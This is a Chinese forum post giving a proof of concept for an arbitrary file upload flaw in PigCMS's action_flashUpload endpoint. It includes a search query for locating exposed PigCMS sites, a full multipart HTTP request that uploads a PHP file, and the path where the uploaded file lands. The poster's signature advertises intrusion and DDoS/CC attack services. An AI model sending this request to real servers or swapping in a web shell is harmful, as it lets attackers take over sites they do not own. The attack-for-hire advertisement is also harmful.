登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
资源区
›
程序
›
PigCMS action_flashUpload 任意文件上传漏洞
漏洞分析
PigCMS action_flashUpload 任意文件上传漏洞
[ 复制链接 ]
anyue1937
2025-10-15 20:07:52
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
## 漏洞描述
PigCMS action_flashUpload 方法中存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件获取到服务器权限
## 漏洞影响
pigcms
## 网络测绘
```app.name="PigCMS"```
## 漏洞复现
登陆页面

验证POC
```POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1Host:Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----aaa
------aaaContent-Disposition: form-data; name="filePath"; filename="test.php"Content-Type: video/x-flv
<?php phpinfo();?>------aaa```

```/cms/upload/images/2025/08/11/1691722887xXbx.php```
渗透
漏洞
getshell
相关帖子
CmsEasy crossall_act.php SQL注入漏洞
Dc-3靶机渗透
DC-4靶机渗透
AI辅助渗透测试小试牛刀
漏洞解析--文件包含漏洞(含漏洞复现)
wepoc Nuclei 漏洞扫描器图形界面工具
MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
DC-01靶场渗透
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
程序
CmsEasy crossall_act.php SQL注入漏洞
3
110
anyue1937
2025-10-15
业界
Dc-3靶机渗透
0
618
骂治并
2025-10-17
科技
DC-4靶机渗透
1
39
缢闸
2025-10-26
科技
AI辅助渗透测试小试牛刀
0
84
尚腱埂
2025-10-29
业界
漏洞解析--文件包含漏洞(含漏洞复现)
5
612
能杜孱
2025-11-05
安全
wepoc Nuclei 漏洞扫描器图形界面工具
3
1028
痕厄
2025-11-06
业界
MySQL8总被扫出漏洞,不想升级该怎么办呢?看我如何应对的
1
285
倡遍竽
2025-11-07
业界
Strix:用AI做渗透测试,把安全漏洞扼杀在开发阶段
1
495
叟澡帅
2025-11-12
安全
DC-01靶场渗透
1
902
姨番单
2025-11-23
回复
(2)
映各
2025-10-31 03:02:59
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
感谢分享,学习下。
喳谍
2025-11-25 20:37:34
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
懂技术并乐意极积无私分享的人越来越少。珍惜
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
anyue1937
2025-11-25 20:37:34
关注
0
粉丝关注
3
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
anyue1937
9994893
kk14977
6845355
3934307807
991122
4
xiangqian
638210
5
宋子
9987
6
闰咄阅
9991
7
刎唇
9993
8
俞瑛瑶
9998
9
蓬森莉
9952
10
匝抽
9986
查看更多